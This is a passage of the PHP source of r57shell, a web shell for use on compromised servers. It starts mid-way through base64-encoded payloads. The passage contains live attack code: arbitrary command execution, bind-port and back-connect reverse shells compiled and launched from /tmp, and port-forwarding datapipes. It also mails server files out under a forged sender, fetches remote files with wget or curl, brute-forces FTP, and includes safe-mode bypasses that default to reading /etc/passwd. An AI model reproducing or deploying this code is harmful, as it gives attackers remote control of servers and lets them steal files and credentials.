+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +echo $head; +echo ''; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print ""; +@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} +echo ' +
'.ws(1).'  +!'.ws(2).'r57shell '.$version.' +'; +echo ws(2); +echo "".date ("d-m-Y H:i:s").""; +echo ws(2).$lb." phpinfo ".$rb; +echo ws(2).$lb." php.ini ".$rb; +echo ws(2).$lb." cpu ".$rb; +echo ws(2).$lb." mem ".$rb; +if($unix) { echo ws(2).$lb." users ".$rb; } +echo ws(2).$lb." tmp ".$rb; +echo ws(2).$lb." delete ".$rb."
"; +echo ws(2); +echo (($safe_mode)?("safe_mode: ON"):("safe_mode: OFF")); +echo ws(2); +echo "PHP version: ".@phpversion().""; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("ON"):("OFF")); +echo ws(2); +echo "MySQL: "; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "ON"; } else { echo "OFF"; } +echo ws(2); +echo "MSSQL: "; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "ON";}else{echo "OFF";} +echo ws(2); +echo "PostgreSQL: "; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "ON";}else{echo "OFF";} +echo ws(2); +echo "Oracle: "; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "ON";}else{echo "OFF";} +echo "
".ws(2); +echo "Disable functions : "; +if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "
".ws(2)."HDD Free : ".view_size($free)." HDD Total : ".view_size($all).""; +echo '
+
+
'; +echo $font; +if(!$windows){ +echo 'uname -a :'.ws(1).'
sysctl :'.ws(1).'
$OSTYPE :'.ws(1).'
Server :'.ws(1).'
id :'.ws(1).'
pwd :'.ws(1).'
'; +echo "		"; +echo ""; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."
"):(ws(3).@substr(@php_uname(),0,120)."
")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."
"; +echo ws(3).ex('echo $OSTYPE')."
"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."
"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."
")); +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo ""; +} +else +{ +echo 'OS :'.ws(1).'
Server :'.ws(1).'
User :'.ws(1).'
pwd :'.ws(1).'
'; +echo "		"; +echo ""; +echo ws(3).@substr(@php_uname(),0,120)."
"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
"; +echo ws(3).@get_current_user()."
"; +echo ws(3).$dir; +echo "
"; +} +echo ""; +echo "
"; +if(empty($c1)||empty($c2)) { die(); } +$f = '
'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n"); + mr($language,$res); + $_POST['cmd']=""; + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + mr($language,$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "
".$lang[$language.'_text61']."
"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "
".$lang[$language.'_text63']."
"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "
".$lang[$language.'_text62']."
"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "
".$lang[$language.'_text64']."
"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "
"; + echo ws(3)."".$_POST['e_name'].""; + echo "
"; + echo ""; + echo ""; + echo ""; + echo (!empty($only_read)?("

".$lang[$language.'_text44']):("

")); + echo "
"; + echo ""; + echo "
"; + echo ""; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + @fwrite($file,$_POST['e_text']); + @fclose($file); + $_POST['cmd']=""; + echo "
".$lang[$language.'_text45']."
"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("
Error uploading file ".$HTTP_POST_FILES['userfile']['name']."
"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); $_POST['cmd'] = ""; } + else if(!$users=get_users()) { echo "
".$lang[$language.'_text96']."
"; $_POST['cmd'] = ""; } + @ftp_close($connection); + } +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": ".$_POST['cmd']."
"; +echo ""; +echo ""; +echo ""; +function up_down($id) + { + global $lang; + global $language; + return ' '; + } +function div($id) + { + if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return ''.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts; +echo sr(15,"".$lang[$language.'_text43'].$arrow."",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.''.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts; +echo sr(15,"".$lang[$language.'_text58'].$arrow."",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."".ws(3)."".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts; +echo sr(15,"".$lang[$language.'_text68'].$arrow."","".ws(2)."".$lang[$language.'_text69'].$arrow."".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."".$lang[$language.'_text70'].$arrow."".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.''.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= ""; + } +echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts; +echo sr(15,"".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."","".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.''.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts; +echo sr(15,"".$lang[$language.'_text52'].$arrow."",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"".$lang[$language.'_text53'].$arrow."",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"".$lang[$language.'_text55'].$arrow."",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.''.$table_end1.$fe; +if(!$safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts; +echo sr(15,"".$lang[$language.'_text72'].$arrow."",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"".$lang[$language.'_text73'].$arrow."",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"".$lang[$language.'_text74'].$arrow."",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.''.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font; +echo "
".div('id9').""; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "
".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "
"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts; +echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts; +echo "
"; +echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts; +echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."".$lang[$language.'_text37'].$arrow."".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."".$lang[$language.'_text38'].$arrow."".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts; +echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."".$lang[$language.'_text37'].$arrow."".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."".$lang[$language.'_text38'].$arrow."".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"".$lang[$language.'_text3'].$arrow."",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo ""; +echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts; +echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile',85,'')); +echo sr(15,"".$lang[$language.'_text21'].$arrow."",in('checkbox','nf1 